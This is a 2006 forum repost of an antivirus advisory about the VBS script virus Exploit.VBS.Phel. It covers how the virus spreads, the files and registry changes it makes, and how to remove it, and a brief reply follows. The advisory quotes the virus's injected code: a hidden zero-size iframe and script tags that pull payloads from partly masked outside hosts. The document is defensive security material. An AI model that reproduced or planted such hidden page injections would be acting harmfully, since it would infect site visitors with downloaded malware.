千家论坛_智能建筑与智能家居技术交流社区

标题: [转帖]警惕病毒Exploit.VBS.Phel [打印本页]

作者: h24arb 时间: 2006-7-20 14:19
标题: [转帖]警惕病毒Exploit.VBS.Phel

转帖:警惕病毒Exploit.VBS.Phel

内容:
一、病毒标签：
病毒名称： Exploit.VBS.Phel
文件 MD5： 49B21DC7A8FDEE131119598E37E39DFA
公开范围：完全公开
危害等级：中
文件长度： 3,284 字节
感染系统： windows98以上版本
开发工具： VB Script
加壳类型：无
命名对照： Symentec[无]
Mcafee[Exploit-ObscuredHtml]

二、病毒描述：
该病毒属VBS脚本病毒，病毒运行后，联接网络，下载病毒文件到系统临时文件夹，修改注册表。该病毒通过mail附件、局域网共享、IRC聊天通道及感染htm、asp、jsp、php等网页文件传播。该病毒对用户有一定危害。

三、行为分析：
1、病毒运行后，下载病毒文件到系统临时文件夹：
%Documents and Settings%\用户名\Local Settings\Temp\nolove.gif
%Documents and Settings%\用户名\Local Settings\Temp\a.asp
2、修改注册表项：
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
键值: 字串: "NotifyDownloadComplete "＝"yes"
3、联接网络：
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp
4、该病毒部分代码为：
<iframe src="http://www.sin***.com/shin/inc/a.asp"width="0"height="0">
<SCRIPT language=JScriptsrc=\\http://www.xuemu****.com/nolove.gif\\"
."+String.fromCharCode(62)+\">
<SCRIPT language=VScript src="nolove.gif">
</SCRIPT><SCRIPTlang uage=VScript src="nolove.pif">
注：%Documents and Settings%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows操作系统中默认的安装路径是C:\ Documents and Settings。
四、清除方案：
1、使用安天木马防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
(1) 使用安天木马防线“进程管理”关闭病毒进程
(2) 删除病毒文件
%Documents and Settings%\用户名\Local Settings\Temp\nolove.gif
%Documents and Settings%\用户名\Local Settings\Temp\a.asp
(3) 恢复病毒修改的注册表项目，删除病毒添加的注册表项
http://www.xuemu****.com/nolove.gif
http://www.sin***.com/shin/inc/a.asp

附：
安天木马防线2005+试用版下载地址:
http://www.antiy.com/product/ghostbusters/index.htm
病毒上报信箱: submit@virusview.net

作者: ivylan53 时间: 2006-7-21 15:54
目前还未发现机子中此病毒,安全报告也好像没有看到

欢迎光临千家论坛_智能建筑与智能家居技术交流社区 (http://bbs.qianjia.com/)